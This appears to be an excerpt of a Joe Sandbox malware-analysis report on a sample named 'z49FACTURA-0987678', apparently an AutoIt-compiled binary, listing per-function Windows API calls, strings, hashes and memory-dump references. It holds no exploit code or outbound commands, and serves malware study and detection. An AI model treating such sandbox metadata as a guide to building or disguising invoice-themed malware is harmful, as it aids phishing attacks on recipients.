                                                                            • Instruction ID: e37e7a08b51009787c210c0d1c6ca4acb2861d06fa4f9aa7f9789321cdcbc3dc
                                                                            • Opcode Fuzzy Hash: 8fce0a85ace68467ca416adb09dfd99af98dffab013f9588fbddf2a272aba463
                                                                            • Instruction Fuzzy Hash: 6F516C71800618EFDF109FA4DC48EAE7BB9FF08322F154265FA11AB2A1D7719954EF90
                                                                            Function 00F589D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F58AC1
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F58AD2
                                                                            • CharNextW.USER32(0000014E), ref: 00F58B01
                                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F58B42
                                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F58B58
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F58B69
                                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F58B86
                                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00F58BD8
                                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F58BEE
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F58C1F
                                                                            • _memset.LIBCMT ref: 00F58C44
                                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F58C8D
                                                                            • _memset.LIBCMT ref: 00F58CEC
                                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F58D16
                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F58D6E
                                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 00F58E1B
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00F58E3D
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F58E87
                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F58EB4
                                                                            • DrawMenuBar.USER32(?), ref: 00F58EC3
                                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00F58EEB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                            • String ID: 0
                                                                            • API String ID: 1073566785-4108050209
                                                                            • Opcode ID: 382fd27b783fbbee7f348d22b1807d390679dd83e083d9a6d09d2120b0337379
                                                                            • Instruction ID: 09843a742c9766f547d53ac88c7be10267275bb14f848bfbd508572cf8bf929e
                                                                            • Opcode Fuzzy Hash: 382fd27b783fbbee7f348d22b1807d390679dd83e083d9a6d09d2120b0337379
                                                                            • Instruction Fuzzy Hash: 4CE15171900208EBDB119F50CC84EEE7BB9EF09761F108156FE15BA191DB748A8AEF61
                                                                            Function 00F5488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 00F549CA
                                                                            • GetDesktopWindow.USER32 ref: 00F549DF
                                                                            • GetWindowRect.USER32(00000000), ref: 00F549E6
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00F54A48
                                                                            • DestroyWindow.USER32(?), ref: 00F54A74
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F54A9D
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F54ABB
                                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F54AE1
                                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 00F54AF6
                                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F54B09
                                                                            • IsWindowVisible.USER32(?), ref: 00F54B29
                                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F54B44
                                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F54B58
                                                                            • GetWindowRect.USER32(?,?), ref: 00F54B70
                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00F54B96
                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00F54BB0
                                                                            • CopyRect.USER32(?,?), ref: 00F54BC7
                                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 00F54C32
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                            • String ID: ($0$tooltips_class32
                                                                            • API String ID: 698492251-4156429822
                                                                            • Opcode ID: 860f2798ec989d7150b347101c543fbbb3e5ba716e7e14a4f870bff18f0f9177
                                                                            • Instruction ID: 24a5e9bd9dfd4197e4a8a6675a12668eee49440f5556abe9b1b944a851f0df1c
                                                                            • Opcode Fuzzy Hash: 860f2798ec989d7150b347101c543fbbb3e5ba716e7e14a4f870bff18f0f9177
                                                                            • Instruction Fuzzy Hash: BDB1BD71604340AFDB04DF64C849B6ABBE4FF88315F00891DFA99AB2A1D770EC49DB95
                                                                            Function 00ED27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00ED28BC
                                                                            • GetSystemMetrics.USER32(00000007), ref: 00ED28C4
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00ED28EF
                                                                            • GetSystemMetrics.USER32(00000008), ref: 00ED28F7
                                                                            • GetSystemMetrics.USER32(00000004), ref: 00ED291C
                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00ED2939
                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00ED2949
                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00ED297C
                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00ED2990
                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 00ED29AE
                                                                            • GetStockObject.GDI32(00000011), ref: 00ED29CA
                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00ED29D5
                                                                              • Part of subcall function 00ED2344: GetCursorPos.USER32(?), ref: 00ED2357
                                                                              • Part of subcall function 00ED2344: ScreenToClient.USER32(00F957B0,?), ref: 00ED2374
                                                                              • Part of subcall function 00ED2344: GetAsyncKeyState.USER32(00000001), ref: 00ED2399
                                                                              • Part of subcall function 00ED2344: GetAsyncKeyState.USER32(00000002), ref: 00ED23A7
                                                                            • SetTimer.USER32(00000000,00000000,00000028,00ED1256), ref: 00ED29FC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                            • String ID: AutoIt v3 GUI
                                                                            • API String ID: 1458621304-248962490
                                                                            • Opcode ID: ace52a26365e2749353cf3ddf3d86a8ea8f0bc98f19b3b81a6eb5129d319b776
                                                                            • Instruction ID: 8abd7512aa76764d0759d64d2bbb31f0bf1a14112497f1f4d75e37850e6b2c01
                                                                            • Opcode Fuzzy Hash: ace52a26365e2749353cf3ddf3d86a8ea8f0bc98f19b3b81a6eb5129d319b776
                                                                            • Instruction Fuzzy Hash: D3B18D71A0020AEFDB15DFA8DC45BAE7BB4FB18711F10422AFA15E72E0DB749841EB50
                                                                            Function 00F3449A Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 179COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscat$B1560_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                            • API String ID: 2719676056-1459072770
                                                                            • Opcode ID: 0fe7decaab90a30928a1b49f405fe2c9f0f153457eb8392b277d46ccd97e418b
                                                                            • Instruction ID: 5ac88beface929a26737d439b45077626203056cc85234bacecc8f176e7c8489
                                                                            • Opcode Fuzzy Hash: 0fe7decaab90a30928a1b49f405fe2c9f0f153457eb8392b277d46ccd97e418b
                                                                            • Instruction Fuzzy Hash: AF41F6729402087BDB11AA74DC07EFF77ACDF45720F04006AFB04F6182EB35EA05A6A6
                                                                            Function 00F2A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00F2A47A
                                                                            • __swprintf.LIBCMT ref: 00F2A51B
                                                                            • _wcscmp.LIBCMT ref: 00F2A52E
                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00F2A583
                                                                            • _wcscmp.LIBCMT ref: 00F2A5BF
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00F2A5F6
                                                                            • GetDlgCtrlID.USER32(?), ref: 00F2A648
                                                                            • GetWindowRect.USER32(?,?), ref: 00F2A67E
                                                                            • GetParent.USER32(?), ref: 00F2A69C
                                                                            • ScreenToClient.USER32(00000000), ref: 00F2A6A3
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00F2A71D
                                                                            • _wcscmp.LIBCMT ref: 00F2A731
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00F2A757
                                                                            • _wcscmp.LIBCMT ref: 00F2A76B
                                                                              • Part of subcall function 00EF362C: _iswctype.LIBCMT ref: 00EF3634
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                            • String ID: %s%u
                                                                            • API String ID: 3744389584-679674701
                                                                            • Opcode ID: aaff7a7be0f5c6bda29c6095d8642acd322cba278e8bf4e3a0a712a6c7074af2
                                                                            • Instruction ID: 6ab719b3486bf431f1caeea862001902d0cbe1c14f360090f297abf6a78bf40f
                                                                            • Opcode Fuzzy Hash: aaff7a7be0f5c6bda29c6095d8642acd322cba278e8bf4e3a0a712a6c7074af2
                                                                            • Instruction Fuzzy Hash: B9A10271604726BFC714DF60D884FAAB7E8FF44320F008529FA99D6190EB30E955DB92
                                                                            Function 00F2AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 00F2AF18
                                                                            • _wcscmp.LIBCMT ref: 00F2AF29
                                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 00F2AF51
                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 00F2AF6E
                                                                            • _wcscmp.LIBCMT ref: 00F2AF8C
                                                                            • _wcsstr.LIBCMT ref: 00F2AF9D
                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00F2AFD5
                                                                            • _wcscmp.LIBCMT ref: 00F2AFE5
                                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 00F2B00C
                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00F2B055
                                                                            • _wcscmp.LIBCMT ref: 00F2B065
                                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 00F2B08D
                                                                            • GetWindowRect.USER32(00000004,?), ref: 00F2B0F6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                            • String ID: @$ThumbnailClass
                                                                            • API String ID: 1788623398-1539354611
                                                                            • Opcode ID: 4056a7ad011d91de42f95c99df6d5a88612997cb178bf7e9b865918ee8e096bb
                                                                            • Instruction ID: 85ba45b01cd97f79a53ac7e4aa2312893c2f4f5f1221cf11df72907c3e030424
                                                                            • Opcode Fuzzy Hash: 4056a7ad011d91de42f95c99df6d5a88612997cb178bf7e9b865918ee8e096bb
                                                                            • Instruction Fuzzy Hash: 4A81D1714083199FDB01DF10E985FAA77E8FF84324F04846AFD859A096DB34DD49EB62
                                                                            Function 00F2ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsnicmp
                                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                            • API String ID: 1038674560-1810252412
                                                                            • Opcode ID: 17be52230a5d9c3932da48ea96fdddf3652a0d8f94308092b39d3889c0531a82
                                                                            • Instruction ID: 7a6b08ea88d0acf7f0986e483e66cb3f0a0c78fc4e50d7499a79c4b9fe062c57
                                                                            • Opcode Fuzzy Hash: 17be52230a5d9c3932da48ea96fdddf3652a0d8f94308092b39d3889c0531a82
                                                                            • Instruction Fuzzy Hash: 8A31A131988319ABDB04FB60EE43FEE77A49B10760F30101AB451711E1FB65EF04A652
                                                                            Function 00F44FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00F45013
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00F4501E
                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00F45029
                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00F45034
                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00F4503F
                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 00F4504A
                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00F45055
                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00F45060
                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00F4506B
                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00F45076
                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00F45081
                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00F4508C
                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00F45097
                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00F450A2
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00F450AD
                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00F450B8
                                                                            • GetCursorInfo.USER32(?), ref: 00F450C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$Load$Info
                                                                            • String ID:
                                                                            • API String ID: 2577412497-0
                                                                            • Opcode ID: 038a6928a623390c8153a5f8ec75cf56e7c9b529f063660c2faa7abfb6162f7e
                                                                            • Instruction ID: c201e9b63a770e3e4bf06fd62b0bbb55e314f8e0e2786a5a008cf269ac8f63ff
                                                                            • Opcode Fuzzy Hash: 038a6928a623390c8153a5f8ec75cf56e7c9b529f063660c2faa7abfb6162f7e
                                                                            • Instruction Fuzzy Hash: 1131F4B1D4831E6BDF109FB68C8995FBFE8FF08750F50452AA50DE7281DA78A5009F91
                                                                            Function 00F5A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00F5A259
                                                                            • DestroyWindow.USER32(?,?), ref: 00F5A2D3
                                                                              • Part of subcall function 00ED7BCC: _memmove.LIBCMT ref: 00ED7C06
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F5A34D
                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F5A36F
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F5A382
                                                                            • DestroyWindow.USER32(00000000), ref: 00F5A3A4
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00ED0000,00000000), ref: 00F5A3DB
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F5A3F4
                                                                            • GetDesktopWindow.USER32 ref: 00F5A40D
                                                                            • GetWindowRect.USER32(00000000), ref: 00F5A414
                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F5A42C
                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F5A444
                                                                              • Part of subcall function 00ED25DB: GetWindowLongW.USER32(?,000000EB), ref: 00ED25EC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                            • String ID: 0$tooltips_class32
                                                                            • API String ID: 1297703922-3619404913
                                                                            • Opcode ID: 8314df981ca7ed61b4591a89a9a8611f84f9473fcfdeb836a61d9437b4f71fb1
                                                                            • Instruction ID: 5fb2c3f68cd7d0f05df6168742359b9dc4adf2f4a26456e6be2bbd773b4d0c90
                                                                            • Opcode Fuzzy Hash: 8314df981ca7ed61b4591a89a9a8611f84f9473fcfdeb836a61d9437b4f71fb1
                                                                            • Instruction Fuzzy Hash: E371CE70540708AFD721CF28CC49F6A7BE5FB88715F04462DFA85872A0D771E91AEB52
                                                                            Function 00F54392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 00F54424
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F5446F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharMessageSendUpper
                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                            • API String ID: 3974292440-4258414348
                                                                            • Opcode ID: f0d2e618aae340d8df67eded0e8beea16bdbf022d813eef4dd97745bbea597c3
                                                                            • Instruction ID: ec2d98be13ab7c0ca31af7ee09a1a096cfb1d10b134a9dddbadb03b7a7df9165
                                                                            • Opcode Fuzzy Hash: f0d2e618aae340d8df67eded0e8beea16bdbf022d813eef4dd97745bbea597c3
                                                                            • Instruction Fuzzy Hash: 1F918A356047018BCB08EF10C851A6EB7E1AF85754F0448A9FD926B3A3CB34EC4AEB81
                                                                            Function 00F5B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F5B8B4
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00F591C2), ref: 00F5B910
                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F5B949
                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00F5B98C
